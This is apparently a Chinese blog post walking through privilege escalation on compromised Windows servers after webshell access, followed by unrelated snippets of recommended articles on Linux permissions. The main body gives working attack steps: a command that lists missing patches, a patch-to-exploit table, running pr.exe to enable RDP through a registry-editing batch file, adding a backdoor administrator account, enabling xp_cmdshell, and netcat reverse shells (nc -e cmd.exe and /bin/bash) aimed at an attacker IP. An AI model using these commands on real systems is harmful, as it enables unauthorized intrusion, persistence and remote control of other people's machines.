linux提升权限,权限提升

最新推荐文章于 2024-03-31 19:07:30 发布
最新推荐文章于 2024-03-31 19:07:30 发布
阅读量545 收藏
点赞数
文章标签: linux提升权限

毕业了,想留的人没能留住,想要的生活也没有如约而至,也就这样了。。。

----  网易云热评

一、基于WebShell的提权

1、访问大马,查看权限

http://192.168.1.147/dm.asp

554b4fa09d5c

2、如果遇到拒绝访问什么可以上传一个aspx的大马,这个权限比较大

http://192.168.1.147/da.aspx

554b4fa09d5c

二、window提权

1、查看系统打补丁情况

win2003:

systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:Windows\tmp\temp.txt

554b4fa09d5c

通用型:

systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:WindowsTemptemp.txt

2、补丁对照表,上传exe,执行命令

KB952004 :MS09-012 PR

KB956572 :MS09-012 巴西烤肉

KB2393802:MS11-011

KB2592799:MS11-080

KB2621440:MS12-0203

KB2160329:MS10-048

KB970483 :MS09-020  iis6提权(可能是)

KB2124261,KB2271195 MS10-065 IIS7提权(可能是)

KB977165 :MS10-015

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB3077657 MS15_077 字体提权

KB944653 MS07-067

KB952004 MS09-012

KB971657 MS09-041

KB2620712 MS11-097

kb942831 MS08-005

KB2503665 MS11-046

KB2592799 MS11-080

3、由于存在PR提权漏洞,所以上传一个pr.exe执行

554b4fa09d5c

4、一般哪些目录有读写权限

日志,缓存、回收站、大马所在目录

5、开启3389,命令行

新建一个bat文件,里面输入以下内容,上传到相应目录

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

del 3389.reg

命令行执行

/c c:\aiyou\pr.exe "c:\aiyou\3389.bat"

554b4fa09d5c

2、用工具开3389端口

554b4fa09d5c

554b4fa09d5c

3、创建用户并添加管理员组

net user abc 123 /add

net localgroup administrators abc /add

三、数据库提权

554b4fa09d5c

XP_CMDSHELL开启方法,新建查询

554b4fa09d5c

554b4fa09d5c

四、反弹shell

1、正向连接,主动连接服务器,服务器开启相应端口

2、反向连接,服务器主动连接我们,我们监听某一端口

小攻: nc -lvvp 1234

小受(webshell):nc.exe -e cmd.exe 192.168.1.133(小攻ip) 1234

3、获取权限

554b4fa09d5c

4、linux系统nc -e /bin/bash 小攻ip 1234

禁止非法,后果自负

欢迎关注公众号:web安全工具库

554b4fa09d5c

何天啸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux权限
xxtzzxx的博客
08-08 1199
就像我们日常生活中提到的医生、教师、程序员等是对一种职业或是一类人的统称,而非指的是具体的某个人。查看上述代码不难看出,bash进程的数目在逐渐增多,会造成对操作系统资源的浪费,所以为了避免这样的情况发生,我们可以通过用户回退的方式来进行用户的切换。那当我们有这么一种需求,others可以在特定的目录下创建自己的文件、写入自己文件、删除自己的文件,但是不想让他删除别人的文件。此外,有这样的一个问题,如果一个目录文件对others具有w权限,那么用户是否能够删除掉目录文件中的其它拥有者的文件?......
linux各种姿势权限提升超超超细致教程
最新发布
qq_41245301的博客
05-14 1446
PATH 环境变量劫持提权,因为PATH环境变量是按照路径顺序执行命令,当黑客把恶意脚本改成你常用的命令并且,把路径改到最前面,那么久会发生环境变量劫持。重点关系统任务计划配置文件(/etc/crontab)的内容?检查root用户的任务计划?查看有没有错误的配置服务?查看配置文件是否包含有漏洞的插件?检查root用户的任务计划(普通用户是没有权限查看的)那些服务是开机运行的?查看当前目下可以读的文件。查看当前目下可以写的文件。查看cron目录中的内容。查看我们具有写入权限的脚本。查看socket的路径。
权限提升Linux
weixin_56537388的博客
09-19 493
我们前面使用SUID提权的时候,其实很多命令都有SUID权限,但是为什么只有find等命令才可以作为提权命令呢,这是由这些命令的功能决定的,如果find没有exec这个参数,那他也不能用来提权,就比如拥有管理员权限的ping命令,但是可以用来提权吗,显然不能。在程序运行的时候,经常需要给程序以高权限,类似于Windows里的以管理员身份运行,通过上面的命令增加SUID,使普通用户可以以root用户的身份运行程序。现在尝试用SUID提权,使用上面的SUID提权网站。攻击者连接受害者主机。
linux提权
mlws1900的博客
07-08 2480
-rw表示文件所有者权限为可读可写不可执行对应第一个root表示文件所有者为root-r--表示只读对应第二个root表示文件所属的组r--代表着other,其他用户(除了该文件所有者和该文件所属组)的权限为只读更改文件权限以上第一张图片的权限用数字(权限码)表示为644(可读可写为4+2,只读为4) 原理:部分命令 特定的权限 验证当前用户密码即可执行root权限 查看哪些命令可以以root执行 查看passwd文件第一列,用户 利用以上命令可提权至rootGTFOBins其他利用方
Linux提权宝典
LiBai'S BLOG
02-14 7947
提权思路:大概思路是通过信息搜集查找可利用的文件/脚本/软件/用户/内核漏洞/恶意劫持/特定平台漏洞/框架漏洞/组件/等,写入或执行恶意命令/脚本/shell/添加高权限用户,提权成功,然后进一步利用。当拿到webshell权限时,由于权限太低有的命令和操作执行不了,所以这时候要提权。uname -a 命令看完Linux内核,直接上扫描器。扫描一下哪些EXP能用,然后直接拿EXP冲他。
THM Linux权限提升权限提升路径
04-22
创建thm文件,内容为执行的命令,赋予可执行权限,运行test文件,执行命令
提升权限模块.rar
03-19
1. **权限提升过程**:在Windows中,这通常涉及"以管理员身份运行"选项,而在Linux中,可能需要使用sudo命令。该过程会要求用户提供相应的凭证,以验证他们有权执行高权限操作。 2. **安全性考量**:权限提升带来...
完整版提升权限.rar
04-02
而在Linux中,使用`sudo`命令提升权限: 1. 打开终端。 2. 输入`sudo`后跟需要执行的命令,例如`sudo apt-get install package_name`来安装软件。 3. 输入当前用户的密码,系统将临时赋予管理员权限。 除了基本的...
Linux权限委派相关学习笔记
04-25
在自动化运维场景中,如使用Ansible,往往不会直接使用root权限操作远程主机,而是通过普通用户利用sudo权限提升到root,以进行自动化操作。例如,安装完成后,通常会修改`/etc/sudoers`文件以适应这种需求。 `sudo...
linux基础权限介绍
01-28
### Linux基础权限详解 #### 一、文件与目录权限概览 在Linux系统中,文件和目录的权限管理是至关重要的。...此外,掌握特殊权限如SUID、SGID和Sticky Bit的使用场景,有助于进一步提升系统的安全性。
Linux】普通用户提升权限
Tianzhenchuan的博客
03-31 462
Linux环境下,给普通用户提权的方式,su与sudo命令,su是将一个普通用户登录为root,而sudo则是将普通用户短暂提升权限普通用户使用$root使用#
Linux系统将普通用户权限提升
qq_42181775的博客
09-05 720
su xxx用户名命令1:查看当前用户名命令2:查看sudoers文件的权限命令3:将etc/sudoers文件权限,修改为可读写。命令4:vim打开etc/sudoers文件,将普通用户写入到红线处。
64权限提升-Linux定时任务&环境变量&数据库
san3144393495的博客
12-26 905
第一个问题,提权环境(webshel环境,或者普通本地权限),信息收集(用信息收集脚本之后首先看,suid,定时任务,可能漏洞*(脚本探针的cve编号漏洞),第三方服务应用(通过脚本手机,比如案例三的mysql数据库作为提权方式))第二个问题,最新相关漏洞要明确(比如及时更新相关脚本),二次开发展望(对脚本自己进行开发优化,现在是脚本小子的意淫时刻)第三个问题,
Linux 提权
代码审计
04-13 2537
Linux提权助手 github项目 cve-2022-0847 面试重要最新漏洞 linux polkit 权限提升 大通杀 一、漏洞概述 1月26日,绿盟科技CERT监测到Qualys研究团队公开披露了在Polkit的pkexec 中发现的一个权限提升漏洞(CVE-2021-4034) ,也被称为PwnKit。该漏洞是由于pkexec 无法正确处理调用参数,从而将环境变量作为命令执行,具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞,从而获得受影响主机的ro
centos7怎么设置静态ip地址_电脑静态IP地址设置,实现局域网络共享
weixin_39665302的博客
11-25 153
局域网领域,打印机共享或是某些网络设置中,常常会需要用到静态IP。怎么设置静态IP就是我们必须了解的,下面就教大家如何在Win7系统下设置静态IP地址,也就局域网中的电脑IP地址。电脑怎么设置静态IP地址:1、 在桌面上右击“网络”,选择“属性”。2、 在弹出的对话框中,单击“本地连接”。3、在弹出的“本地连接状态”对话框中,单击“属性”按钮。4、在弹出的“网络”对话框中,单击“Inte...
Linux系统中将普通用户权限提升至root权限
热门推荐
学习中~
07-02 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
Linux提权的几种常用方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 1444
Linux提权的几种常用方法总结:分为6种 1、Linux提权之内核漏洞提权 2、Linux提权之利用SUID提权 3、Linux提权之SUDO提权 4、Linux提权之计划任务 5、Linux提权之NFS提权 6、Linux提权之利用MySQL提权 提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,同时可以通过该漏洞实现Docker容器逃逸,获得root权限的shell。 本地内核提权
Linux提升权限,代码
05-19
Linux系统中,提升权限可以使用命令`sudo`或`su`。其中,`sudo`可以在不切换用户的情况下执行特定命令,并且可以授权给其他用户执行权限;而`su`则是切换用户到超级用户(root)。 下面是使用`sudo`命令提升权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值